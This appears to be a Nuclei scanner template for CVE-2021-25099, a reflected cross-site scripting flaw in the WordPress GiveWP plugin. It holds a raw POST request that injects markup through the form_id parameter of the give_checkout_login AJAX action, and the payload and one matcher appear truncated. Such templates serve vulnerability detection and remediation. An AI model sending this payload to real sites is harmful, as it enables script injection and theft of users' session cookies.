id: CVE-2021-25099 info: name: WordPress GiveWP <2.17.3 - Cross-Site Scripting author: theamanrawat severity: medium description: | WordPress GiveWP plugin before 2.17.3 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the form_id parameter before returning it in the response of an unauthenticated request via the give_checkout_login AJAX action. An attacker can inject arbitrary script in the browser of a user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. remediation: | Update to the latest version of the GiveWP plugin (2.17.3 or higher) to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/87a64b27-23a3-40f5-a3d8-0650975fee6f - https://wordpress.org/plugins/give/ - https://nvd.nist.gov/vuln/detail/CVE-2021-25099 - https://plugins.trac.wordpress.org/changeset/2659032 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-25099 cwe-id: CWE-79 epss-score: 0.001 epss-percentile: 0.40867 cpe: cpe:2.3:a:givewp:givewp:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: givewp product: givewp framework: wordpress tags: xss,cve2021,wp,give,wordpress,cve,wp-plugin,unauth,wpscan http: - raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 action=give_checkout_login&form_id=xxxxxx"> matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(content_type, "text/html")' - 'contains(body, "")' - 'contains(body, "give_user_login")' condition: and # digest: 490a0046304402200ec84b2d4b7835fcd5fecdb62c039fe350d59232eef9d9a5e105acfa13c4e7a1022024061e0b965a13b77930dd9faaeac54243d8e41191148011253041cc4dd63b4a:922c64590222798bb761d5b6d8e72950